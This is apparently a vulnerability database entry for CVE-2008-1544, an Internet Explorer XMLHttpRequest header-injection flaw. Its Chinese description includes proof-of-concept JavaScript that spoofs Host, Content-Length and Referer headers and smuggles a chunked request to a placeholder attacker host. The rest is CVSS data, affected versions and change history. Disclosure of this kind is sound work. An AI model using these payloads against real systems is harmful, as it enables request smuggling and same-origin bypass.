CVE-2008-1544 (CNNVD-200803-469)
中文标题:
Microsoft IE 7 setRequestHeader()函数请求拆分漏洞
英文标题:
The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and...
漏洞描述
中文描述:
Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。 类似于以下javascript: ---------------------------------------------- var x=new XMLHttpRequest(); x.open("POST","/"); for(f=127;f<255;f++) try{ x.setRequestHeader("Host"+String.fromCharCode(f),"Test"); }catch(dd){} x.setRequestHeader("Connection","keep-alive"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } x.send("blah"); ---------------------------------------------- 会覆盖以下头: - Content-Length x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0"); x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0"); x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0"); - Host x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com"); - Referer x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld"); x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld"); Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。 假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置 setRequestHeader("Transfer-Encoding","chunked"); 因此就允许将POST请求中的负载用作Web服务器的其他请求。例如: ----------------------------------------------------- var x=new XMLHttpRequest(); for(var i =0; i<1;i++){ x.open("POST","/"); x.setRequestHeader("Transfer-Encoding","chunked"); x.setRequestHeader("Proxy-Connection","keep-alive"); x.setRequestHeader("Connection","keep-alive"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } try{ x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost: at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n") }catch(r){} } ----------------------------------------------------- 请求会变为: ---------------------------------------------------- POST / HTTP/1.1 Accept: */* Accept-Language: it Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache Referer: http://vi.ct.im/ UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Host: at.tack.er Content-Length: 67 0 POST /?Send1 HTTP/1.1 Host: at.tack.er Content-Length: TheLenghtOfTheNextRequest ---------------------------------------------------- 这样Web服务器就会打开套接字等待负载。
英文描述:
The setRequestHeader method of the XMLHttpRequest object in Microsoft Internet Explorer 5.01, 6, and 7 does not block dangerous HTTP request headers when certain 8-bit character sequences are appended to a header name, which allows remote attackers to (1) conduct HTTP request splitting and HTTP request smuggling attacks via an incorrect Content-Length header, (2) access arbitrary virtual hosts via a modified Host header, (3) bypass referrer restrictions via an incorrect Referer header, and (4) bypass the same-origin policy and obtain sensitive information via a crafted request header.
CWE类型:
标签:
受影响产品
| 厂商 | 产品 | 版本 | 版本范围 | 平台 | CPE |
|---|---|---|---|---|---|
| microsoft | internet_explorer | 5.01 | - | - |
cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*
|
| microsoft | internet_explorer | 6 | - | - |
cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*
|
| microsoft | internet_explorer | 7 | - | - |
cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*
|
解决方案
中文解决方案:
英文解决方案:
临时解决方案:
参考链接
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
cve.org
CVSS评分详情
AV:N/AC:M/Au:N/C:C/I:N/A:N
时间信息
利用信息
数据源详情
| 数据源 | 记录ID | 版本 | 提取时间 |
|---|---|---|---|
| CVE | cve_CVE-2008-1544 |
2025-11-11 15:17:59 | 2025-11-11 07:32:51 |
| NVD | nvd_CVE-2008-1544 |
2025-11-11 14:52:33 | 2025-11-11 07:41:37 |
| CNNVD | cnnvd_CNNVD-200803-469 |
2025-11-11 15:09:00 | 2025-11-11 07:49:25 |
版本与语言
安全公告
变更历史
查看详细变更
- vulnerability_type: 未提取 -> 授权问题
- cnnvd_id: 未提取 -> CNNVD-200803-469
- data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
查看详细变更
- severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
- cvss_score: 未提取 -> 7.1
- cvss_vector: NOT_EXTRACTED -> AV:N/AC:M/Au:N/C:C/I:N/A:N
- cvss_version: NOT_EXTRACTED -> 2.0
- affected_products_count: 0 -> 3
- references_count: 13 -> 12
- data_sources: ['cve'] -> ['cve', 'nvd']